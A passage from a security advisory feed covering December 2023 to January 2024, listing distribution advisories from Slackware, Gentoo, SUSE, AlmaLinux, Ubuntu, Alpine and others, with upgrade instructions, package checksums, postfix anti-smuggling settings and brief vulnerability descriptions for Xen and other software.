d459babbab7447215e65577a847b0eeb proftpd-1.3.8b-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
603638e2b7ca0db3f4463a73525ee2a5 proftpd-1.3.8b-x86_64-1_slack15.0.txz

Slackware -current package:
9bf202802b1fdf70e3cdeff86a89ef09 n/proftpd-1.3.8b-i586-1.txz

Slackware x86_64 -current package:
dfbbc5d28742b30770b35a36db8e2763 n/proftpd-1.3.8b-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg proftpd-1.3.8b-i586-1_slack15.0.txz`

https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-354-01
20.12.2023 02:00:00 | gentoo | [GLSA-202312-02] Minecraft Server: Remote Code Execution (high) | A vulnerability has been found in Minecraft Server which leads to remote code execution. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-02

20.12.2023 02:00:00 | gentoo | [GLSA-202312-03] Mozilla Thunderbird: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been found in Mozilla Thunderbird, the worst of which could lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-03

21.12.2023 00:33:59 | rustsec | [RUSTSEC-2023-0075] Unaligned write of u64 on 32-bit and 16-bit platforms

Affected versions allocate memory using the alignment of `usize` and write data to it of type `u64`, without using `core::ptr::write_unaligned`. On platforms with sub-64-bit alignment for `usize` (including wasm32 and x86) these writes are insufficiently aligned some of the time.

If using an ordinary optimized standard library, the bug exhibits Undefined Behavior, so it may or may not behave in any sensible way, depending on optimization settings, hardware and other things. If using a Rust standard library built with debug assertions enabled, the bug manifests deterministically in a crash (non-unwinding panic) saying _"ptr::write requires that the pointer argument is aligned and non-null"_.

No 64-bit platform is impacted by the bug.

The flaw was corrected by allocating with adequately high alignment on all platforms.

https://secdb.nttzen.cloud/security-advisory/detail/RUSTSEC-2023-0075

20.12.2023 14:50:26 | almalinux | [ALSA-2023:7876] opensc security update (moderate) | opensc security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7876

20.12.2023 14:42:21 | almalinux | [ALSA-2023:7877] openssl security update (low) | openssl security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7877

21.12.2023 20:16:53 | msrc | [MS:CVE-2023-7024] Chromium: CVE-2023-7024 Heap buffer overflow in WebRTC | https://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2023-7024

22.12.2023 02:00:00 | gentoo | [GLSA-202312-04] Arduino: Remote Code Execution (normal) | A vulnerability has been found in Arduino, which bundled a vulnerable version of log4j. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-04

22.12.2023 02:00:00 | gentoo | [GLSA-202312-05] libssh: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-05

22.12.2023 02:00:00 | gentoo | [GLSA-202312-06] Exiv2: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in Exiv2, the worst of which can lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-06

22.12.2023 02:00:00 | gentoo | [GLSA-202312-07] QtWebEngine: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in QtWebEngine, the worst of which could lead to remote code execution. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-07

22.12.2023 02:00:00 | gentoo | [GLSA-202312-08] LibRaw: Heap Buffer Overflow (high) | A vulnerability has been found in LibRaw where a heap buffer overflow may lead to an application crash. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-08

22.12.2023 02:00:00 | gentoo | [GLSA-202312-09] NASM: Multiple Vulnerabilities (high) | Multiple vulnerabilities have been discovered in NASM, the worst of which could lead to arbitrary code execution. | https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-09

21.12.2023 21:33:30 | suse | [SUSE-SU-2023:4957-1] Security update for libcryptopp (moderate) | Security update for libcryptopp | https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4957-1

22.12.2023 11:44:51 | almalinux | [ALSA-2023:7879] opensc security update (moderate) | opensc security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7879

22.12.2023 11:34:57 | almalinux | [ALSA-2023:7790] postgresql:10 security update (important) | postgresql:10 security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7790

22.12.2023 11:57:58 | almalinux | [ALSA-2023:7785] postgresql:15 security update (important) | postgresql:15 security update | https://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7785
23.12.2023 04:53:12 | slackware | [SSA:2023-356-01] postfix

New postfix packages are available for Slackware 15.0 and -current to fix a security issue.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/postfix-3.6.13-i586-1_slack15.0.txz: Upgraded.
  Security: this release adds support to defend against an email spoofing
  attack (SMTP smuggling) on recipients at a Postfix server. Sites concerned
  about SMTP smuggling attacks should enable this feature on Internet-facing
  Postfix servers. For compatibility with non-standard clients, Postfix by
  default excludes clients in mynetworks from this countermeasure.
  The recommended settings are:
    # Optionally disconnect remote SMTP clients that send bare newlines,
    # but allow local clients with non-standard SMTP implementations
    # such as netcat, fax machines, or load balancer health checks.
    #
    smtpd_forbid_bare_newline = yes
    smtpd_forbid_bare_newline_exclusions = $mynetworks
  The smtpd_forbid_bare_newline feature is disabled by default.
  For more information, see:
    https://www.postfix.org/smtp-smuggling.html
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/postfix-3.6.13-i586-1_slack15.0.txz

Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/postfix-3.6.13-x86_64-1_slack15.0.txz

Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/postfix-3.8.4-i586-1.txz

Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/postfix-3.8.4-x86_64-1.txz

**MD5 signatures**

Slackware 15.0 package:
1d5c7eec8f39a89e957abf39a1e79560 postfix-3.6.13-i586-1_slack15.0.txz

Slackware x86_64 15.0 package:
7286fabbc87a7dfdcc2b1ab4c6c2f4f5 postfix-3.6.13-x86_64-1_slack15.0.txz

Slackware -current package:
27f27ac76a52652599dc7b7d885fa4e1 n/postfix-3.8.4-i586-1.txz

Slackware x86_64 -current package:
c49061c599d2667dbea79227b8e6bb18 n/postfix-3.8.4-x86_64-1.txz

**Installation instructions**

Upgrade the package as root:
`# upgradepkg postfix-3.6.13-i586-1_slack15.0.txz`

Restart the postfix server:
`# /etc/rc.d/rc.postfix restart`

https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-356-01
23.12.2023 02:00:00gentoo[GLSA-202312-12] Flatpak: Multiple Vulnerabilities (high)Several vulnerabilities have been found in Flatpak, the worst of which lead to privilege escalation and sandbox escape.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-12
23.12.2023 02:00:00gentoo[GLSA-202312-10] Ceph: Root Privilege Escalation (high)A vulnerability has been found in Ceph which can lead to root privilege escalation.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-10
23.12.2023 02:00:00gentoo[GLSA-202312-11] SABnzbd: Remote Code Execution (high)A vulnerability has been found in SABnzbd which allows for remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-11
23.12.2023 02:00:00gentoo[GLSA-202312-13] Gitea: Multiple Vulnerabilities (low)Multiple vulnerabilities have been discovered in Gitea, the worst of which could result in information leakage.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-13
23.12.2023 02:00:00gentoo[GLSA-202312-14] FFmpeg: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in FFmpeg, the worst of which could lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-14
22.12.2023 17:33:47suse[SUSE-SU-2023:4965-1] Security update for ppp (moderate)Security update for ppphttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4965-1
22.12.2023 12:03:43suse[SUSE-SU-2023:4961-1] Security update for ppp (moderate)Security update for ppphttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4961-1
26.12.2023 02:24:31slackware[SSA:2023-359-01] Slackware 15.0 kernel
New kernel packages are available for Slackware 15.0 to fix bugs and security issues.

**Here are the details from the Slackware 15.0 ChangeLog**

```
patches/packages/linux-5.15.145/*: Upgraded.
  These updates fix various bugs and security issues.
  Thanks to jwoithe for the PCI fix!
  Be sure to upgrade your initrd after upgrading the kernel packages.
  If you use lilo to boot your machine, be sure lilo.conf points to the correct
  kernel and initrd and run lilo as root to update the bootloader.
  If you use elilo to boot your machine, you should run eliloconfig to copy the
  kernel and initrd to the EFI System Partition.
  For more information, see:
    Fixed in 5.15.140:
    https://www.cve.org/CVERecord?id=CVE-2023-46862
    Fixed in 5.15.141:
    https://www.cve.org/CVERecord?id=CVE-2023-6121
  (* Security fix *)
```

**Where to find the new packages**

Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)

Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.

Updated packages for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-generic-5.15.145-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-generic-smp-5.15.145_smp-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-headers-5.15.145_smp-x86-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-huge-5.15.145-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-huge-smp-5.15.145_smp-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-modules-5.15.145-i586-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-modules-smp-5.15.145_smp-i686-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/linux-5.15.145/kernel-source-5.15.145_smp-noarch-1.txz

Updated packages for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-generic-5.15.145-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-headers-5.15.145-x86-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-huge-5.15.145-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-modules-5.15.145-x86_64-1.txz
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/linux-5.15.145/kernel-source-5.15.145-noarch-1.txz

**MD5 signatures**

Slackware 15.0 packages:
993d69a60c60ec423daa5a3791382b65  kernel-generic-5.15.145-i586-1.txz
55c5ba0202ebae9633ec5d8dd5bcd035  kernel-generic-smp-5.15.145_smp-i686-1.txz
fa28c9e9869c2eb54c57163fa8421717  kernel-headers-5.15.145_smp-x86-1.txz
f60c9ba6cae50da0626b6c3b111e592a  kernel-huge-5.15.145-i586-1.txz
fd1d19f409ac0ed496d175811c0fbc55  kernel-huge-smp-5.15.145_smp-i686-1.txz
ce5adb250a52a5b0a1ab9fa5cca83ac6  kernel-modules-5.15.145-i586-1.txz
44bcc4f2b5256bff442efa147ab8621d  kernel-modules-smp-5.15.145_smp-i686-1.txz
b896f78655e83e4ff8d62b2e3102fdc1  kernel-source-5.15.145_smp-noarch-1.txz

Slackware x86_64 15.0 packages:
ca4ca32bb2da2a98ce57ba1c1c3a409f  kernel-generic-5.15.145-x86_64-1.txz
5b8d82bcbb19120c009dd5bd40bb5c48  kernel-headers-5.15.145-x86-1.txz
258306395ac2400ae7a9d9388a3b0ec7  kernel-huge-5.15.145-x86_64-1.txz
f665be1a791e806893f73ef4b64ff465  kernel-modules-5.15.145-x86_64-1.txz
478e1eabf7561f36b09d7eb4e3948183  kernel-source-5.15.145-noarch-1.txz

**Installation instructions**

Upgrade the packages as root:
`# upgradepkg kernel-*.txz`

If you are using an initrd, you'll need to rebuild it.

For a 32-bit SMP machine, use this command (substitute the appropriate kernel version if you are not running Slackware 15.0):
`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.145-smp | bash`

For a 64-bit machine, or a 32-bit uniprocessor machine, use this command (substitute the appropriate kernel version if you are not running Slackware 15.0):
`# /usr/share/mkinitrd/mkinitrd_command_generator.sh -k 5.15.145 | bash`

Please note that "uniprocessor" has to do with the kernel you are running, not with the CPU. Most systems should run the SMP kernel (if they can) regardless of the number of cores the CPU has. If you aren't sure which kernel you are running, run "uname -a". If you see SMP there, you are running the SMP kernel and should use the 5.15.145-smp version when running mkinitrd_command_generator. Note that this is only for 32-bit -- 64-bit systems should always use 5.15.145 as the version.

If you are using lilo or elilo to boot the machine, you'll need to ensure that the machine is properly prepared before rebooting.

If using LILO:
By default, lilo.conf contains an image= line that references a symlink that always points to the correct kernel. No editing should be required unless your machine uses a custom lilo.conf. If that is the case, be sure that the image= line references the correct kernel file. Either way, you'll need to run "lilo" as root to reinstall the boot loader.

If using elilo:
Ensure that the /boot/vmlinuz symlink is pointing to the kernel you wish to use, and then run eliloconfig to update the EFI System Partition.

https://secdb.nttzen.cloud/security-advisory/detail/SSA:2023-359-01
24.12.2023 13:01:00opensuse[openSUSE-SU-2023:0413-1] Security update for cppcheck (moderate)Security update for cppcheckhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0413-1
25.12.2023 11:42:53almalinux[ALSA-2023:7884] postgresql:15 security update (important)postgresql:15 security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2023:7884
27.12.2023 02:00:00gentoo[GLSA-202312-15] Git: Multiple Vulnerabilities (high)Several vulnerabilities have been found in Git, the worst of which could lead to remote code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-15
26.12.2023 06:02:37suse[SUSE-SU-2023:4974-1] Security update for distribution (moderate)Security update for distributionhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4974-1
26.12.2023 05:09:58suse[SUSE-SU-2023:4972-1] Security update for gstreamer-plugins-bad (important)Security update for gstreamer-plugins-badhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4972-1
28.12.2023 02:00:00gentoo[GLSA-202312-16] libssh: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in libssh, the worst of which could lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-16
28.12.2023 02:00:00gentoo[GLSA-202312-17] OpenSSH: Multiple Vulnerabilities (high)Multiple vulnerabilities have been discovered in OpenSSH, the worst of which could lead to code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202312-17
27.12.2023 23:40:25opensuse[openSUSE-SU-2023:0419-1] Security update for zabbix (important)Security update for zabbixhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0419-1
27.12.2023 23:40:21opensuse[openSUSE-SU-2023:0418-1] Security update for zabbix (important)Security update for zabbixhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0418-1
27.12.2023 17:33:47suse[SUSE-SU-2023:4980-1] Security update for gstreamer (important)Security update for gstreamerhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4980-1
27.12.2023 15:33:40suse[SUSE-SU-2023:4978-1] Security update for webkit2gtk3 (important)Security update for webkit2gtk3https://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4978-1
28.12.2023 14:52:03rubysec[RUBYSEC:ACTIVEADMIN-2023-51763] ActiveAdmin vulnerable to CSV injection (high)csv_builder.rb in ActiveAdmin (aka Active Admin) before 3.2.0 allows CSV injection.https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:ACTIVEADMIN-2023-51763
28.12.2023 17:06:57suse[SUSE-SU-2023:4988-1] Security update for python-pip (low)Security update for python-piphttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4988-1
28.12.2023 17:06:28suse[SUSE-SU-2023:4987-1] Security update for python-pip (low)Security update for python-piphttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4987-1
28.12.2023 17:06:09suse[SUSE-SU-2023:4986-1] Security update for gnutls (moderate)Security update for gnutlshttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4986-1
28.12.2023 16:38:44suse[SUSE-SU-2023:4984-1] Security update for libreoffice (important)Security update for libreofficehttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4984-1
28.12.2023 15:22:03suse[SUSE-SU-2023:4983-1] Security update for gnutls (moderate)Security update for gnutlshttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4983-1
28.12.2023 15:16:05suse[SUSE-SU-2023:4982-1] Security update for gstreamer (important)Security update for gstreamerhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2023:4982-1
30.12.2023 16:24:56opensuse[openSUSE-SU-2023:0424-1] Security update for deepin-compressor (moderate)Security update for deepin-compressorhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0424-1
30.12.2023 16:24:53opensuse[openSUSE-SU-2023:0423-1] Security update for deepin-compressor (moderate)Security update for deepin-compressorhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0423-1
30.12.2023 16:24:43opensuse[openSUSE-SU-2023:0421-1] Security update for proftpd (important)Security update for proftpdhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2023:0421-1
02.01.2024 11:28:23ubuntu[USN-6563-1] Thunderbird vulnerabilitiesSeveral security issues were fixed in Thunderbird.https://secdb.nttzen.cloud/security-advisory/detail/USN-6563-1
02.01.2024 05:25:53ubuntu[USN-6562-1] Firefox vulnerabilitiesSeveral security issues were fixed in Firefox.https://secdb.nttzen.cloud/security-advisory/detail/USN-6562-1
02.01.2024 02:00:00gentoo[GLSA-202401-01] Joblib: Arbitrary Code Execution (high)A vulnerability has been found in Joblib which allows for arbitrary code execution.https://secdb.nttzen.cloud/security-advisory/detail/GLSA-202401-01
01.01.2024 13:01:07opensuse[openSUSE-SU-2024:0002-1] Security update for opera (important)Security update for operahttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0002-1
01.01.2024 13:01:03opensuse[openSUSE-SU-2024:0001-1] Security update for opera (important)Security update for operahttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0001-1
03.01.2024 20:09:00ubuntu[USN-6566-1] SQLite vulnerabilitiesSeveral security issues were fixed in SQLite.https://secdb.nttzen.cloud/security-advisory/detail/USN-6566-1
03.01.2024 20:00:01ubuntu[USN-6565-1] OpenSSH vulnerabilitiesSeveral security issues were fixed in OpenSSH.https://secdb.nttzen.cloud/security-advisory/detail/USN-6565-1
03.01.2024 19:15:11alpinelinux[ALPINE:CVE-2023-6004] libssh vulnerability[From CVE-2023-6004] A flaw was found in libssh. By utilizing the ProxyCommand or ProxyJump feature, users can exploit unchecked hostname syntax on the client. This issue may allow an attacker to inject malicious code into the command of the features mentioned through the hostname parameter.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-6004
03.01.2024 11:31:07ubuntu[USN-6564-1] Node.js vulnerabilitiesSeveral security issues were fixed in Node.js.https://secdb.nttzen.cloud/security-advisory/detail/USN-6564-1
03.01.2024 02:00:00cpan[CPANSA-Spreadsheet-ParseXLSX-2024-01] Spreadsheet-ParseXLSX vulnerabilityParseXLSX also handles merged cells, but the memoize implementation allows an attacker to allocate an arbitrary amount of memory.https://secdb.nttzen.cloud/security-advisory/detail/CPANSA-Spreadsheet-ParseXLSX-2024-01
02.01.2024 19:51:48suse[SUSE-SU-2024:0014-1] Security update for w3m (moderate)Security update for w3mhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0014-1
02.01.2024 17:14:17suse[SUSE-SU-2024:0012-1] Security update for postfix (important)Security update for postfixhttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0012-1
02.01.2024 14:21:20suse[SUSE-SU-2024:0010-1] Security update for polkit (moderate)Security update for polkithttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0010-1
02.01.2024 11:41:25suse[SUSE-SU-2024:0006-1] Security update for libssh2_org (moderate)Security update for libssh2_orghttps://secdb.nttzen.cloud/security-advisory/detail/SUSE-SU-2024:0006-1
03.01.2024 22:12:53opensuse[openSUSE-SU-2024:0008-1] Security update for proftpd (important)Security update for proftpdhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0008-1
03.01.2024 22:12:49opensuse[openSUSE-SU-2024:0007-1] Security update for exim (important)Security update for eximhttps://secdb.nttzen.cloud/security-advisory/detail/openSUSE-SU-2024:0007-1
04.01.2024 17:11:58rubysec[RUBYSEC:OMNIAUTH-MICROSOFT_GRAPH-2024-21632] Omniauth::MicrosoftGraph Account takeover (nOAuth) (high)

### Summary

The implementation did not validate the legitimacy of the `email` attribute of the user, nor did it give/document an option to do so, making it susceptible to [nOAuth](https://www.descope.com/blog/post/noauth) misconfiguration in cases when the `email` is used as a trusted user identifier.

https://secdb.nttzen.cloud/security-advisory/detail/RUBYSEC:OMNIAUTH-MICROSOFT_GRAPH-2024-21632
04.01.2024 16:24:24almalinux[ALSA-2024:0018] tigervnc security update (important)tigervnc security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2024:0018
04.01.2024 16:29:24almalinux[ALSA-2024:0012] firefox security update (important)firefox security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2024:0012
04.01.2024 16:33:51almalinux[ALSA-2024:0003] thunderbird security update (important)thunderbird security updatehttps://secdb.nttzen.cloud/security-advisory/detail/ALSA-2024:0003
05.01.2024 19:15:11alpinelinux[ALPINE:CVE-2023-46835] xen vulnerability[From CVE-2023-46835] The current setup of the quarantine page tables assumes that the quarantine domain (dom_io) has been initialized with an address width of DEFAULT_DOMAIN_ADDRESS_WIDTH (48) and hence 4 page table levels. However dom_io being a PV domain gets the AMD-Vi IOMMU page tables levels based on the maximum (hot pluggable) RAM address, and hence on systems with no RAM above the 512GB mark only 3 page-table levels are configured in the IOMMU. On systems without RAM above the 512GB boundary amd_iommu_quarantine_init() will setup page tables for the scratch page with 4 levels, while the IOMMU will be configured to use 3 levels only, resulting in the last page table directory (PDE) effectively becoming a page table entry (PTE), and hence a device in quarantine mode gaining write access to the page destined to be a PDE. Due to this page table level mismatch, the sink page the device gets read/write access to is no longer cleared between device assignment, possibly leading to data leaks.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46835
05.01.2024 19:15:11alpinelinux[ALPINE:CVE-2023-46836] xen vulnerability[From CVE-2023-46836] The fixes for XSA-422 (Branch Type Confusion) and XSA-434 (Speculative Return Stack Overflow) are not IRQ-safe. It was believed that the mitigations always operated in contexts with IRQs disabled. However, the original XSA-254 fix for Meltdown (XPTI) deliberately left interrupts enabled on two entry paths; one unconditionally, and one conditionally on whether XPTI was active. As BTC/SRSO and Meltdown affect different CPU vendors, the mitigations are not active together by default. Therefore, there is a race condition whereby a malicious PV guest can bypass BTC/SRSO protections and launch a BTC/SRSO attack against Xen.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46836
05.01.2024 19:15:11alpinelinux[ALPINE:CVE-2023-46837] xen vulnerability[From CVE-2023-46837] Arm provides multiple helpers to clean & invalidate the cache for a given region. This is, for instance, used when allocating guest memory to ensure any writes (such as the ones during scrubbing) have reached memory before handing over the page to a guest. Unfortunately, the arithmetics in the helpers can overflow and would then result in skipping the cache cleaning/invalidation. Therefore there is no guarantee when all the writes will reach the memory. This undefined behavior was meant to be addressed by XSA-437, but the approach was not sufficient.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-46837
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34321] xen vulnerability[From CVE-2023-34321] Arm provides multiple helpers to clean & invalidate the cache for a given region. This is, for instance, used when allocating guest memory to ensure any writes (such as the ones during scrubbing) have reached memory before handing over the page to a guest. Unfortunately, the arithmetics in the helpers can overflow and would then result in skipping the cache cleaning/invalidation. Therefore there is no guarantee when all the writes will reach the memory.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34321
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34322] xen vulnerability[From CVE-2023-34322] For migration as well as to work around kernels unaware of L1TF (see XSA-273), PV guests may be run in shadow paging mode. Since Xen itself needs to be mapped when PV guests run, Xen and shadowed PV guests run directly on the respective shadow page tables. For 64-bit PV guests this means running on the shadow of the guest root page table. In the course of dealing with shortage of memory in the shadow pool associated with a domain, shadows of page tables may be torn down. This tearing down may include the shadow root page table that the CPU in question is presently running on. While a precaution exists to supposedly prevent the tearing down of the underlying live page table, the time window covered by that precaution isn't large enough.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34322
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34323] xen vulnerability[From CVE-2023-34323] When a transaction is committed, C Xenstored will first check the quota is correct before attempting to commit any nodes. It would be possible that accounting is temporarily negative if a node has been removed outside of the transaction. Unfortunately, some versions of C Xenstored are assuming that the quota cannot be negative and are using assert() to confirm it. This will lead to a C Xenstored crash when tools are built without -DNDEBUG (this is the default).https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34323
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34325] xen vulnerability[From CVE-2023-34325] [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] libfsimage contains parsing code for several filesystems, most of them based on grub-legacy code. libfsimage is used by pygrub to inspect guest disks. Pygrub runs as the same user as the toolstack (root in a privileged domain). At least one issue has been reported to the Xen Security Team that allows an attacker to trigger a stack buffer overflow in libfsimage. After further analysis the Xen Security Team is no longer confident in the suitability of libfsimage when run against guest controlled input with super user privileges. In order to not affect current deployments that rely on pygrub, patches are provided in the resolution section of the advisory that allow running pygrub in deprivileged mode. CVE-2023-4949 refers to the original issue in the upstream grub project ("An attacker with local access to a system (either through a disk or external drive) can present a modified XFS partition to grub-legacy in such a way to exploit a memory corruption in grub's XFS file system implementation."). CVE-2023-34325 refers specifically to the vulnerabilities in Xen's copy of libfsimage, which is descended from a very old version of grub.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34325
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34326] xen vulnerability[From CVE-2023-34326] The caching invalidation guidelines from the AMD-Vi specification (48882—Rev3.07-PUB—Oct 2022) are incorrect on some hardware, as devices will malfunction (see stale DMA mappings) if some fields of the DTE are updated but the IOMMU TLB is not flushed. Such stale DMA mappings can point to memory ranges not owned by the guest, thus allowing access to unintended memory regions.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34326
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34327] xen vulnerability[From CVE-2023-34327] [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] AMD CPUs since ~2014 have extensions to normal x86 debugging functionality. Xen supports guests using these extensions. Unfortunately there are errors in Xen's handling of the guest state, leading to denials of service. 1) CVE-2023-34327 - An HVM vCPU can end up operating in the context of a previous vCPU's debug mask state. 2) CVE-2023-34328 - A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34327
05.01.2024 19:15:08alpinelinux[ALPINE:CVE-2023-34328] xen vulnerability[From CVE-2023-34328] [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] AMD CPUs since ~2014 have extensions to normal x86 debugging functionality. Xen supports guests using these extensions. Unfortunately there are errors in Xen's handling of the guest state, leading to denials of service. 1) CVE-2023-34327 - An HVM vCPU can end up operating in the context of a previous vCPU's debug mask state. 2) CVE-2023-34328 - A PV vCPU can place a breakpoint over the live GDT. This allows the PV vCPU to exploit XSA-156 / CVE-2015-8104 and lock up the CPU entirely.https://secdb.nttzen.cloud/security-advisory/detail/ALPINE:CVE-2023-34328
05.01.2024 19:08:32msrc[MS:CVE-2024-0225] Chromium: CVE-2024-0225 Use after free in WebGPUhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0225
05.01.2024 19:08:30msrc[MS:CVE-2024-0224] Chromium: CVE-2024-0224 Use after free in WebAudiohttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0224
05.01.2024 19:08:28msrc[MS:CVE-2024-0223] Chromium: CVE-2024-0223 Heap buffer overflow in ANGLEhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0223
05.01.2024 19:08:23msrc[MS:CVE-2024-0222] Chromium: CVE-2024-0222 Use after free in ANGLEhttps://secdb.nttzen.cloud/security-advisory/detail/MS:CVE-2024-0222
05.01.2024 15:25:40ubuntu[USN-6549-4] Linux kernel (Intel IoTG) vulnerabilitiesSeveral security issues were fixed in the Linux kernel.https://secdb.nttzen.cloud/security-advisory/detail/USN-6549-4
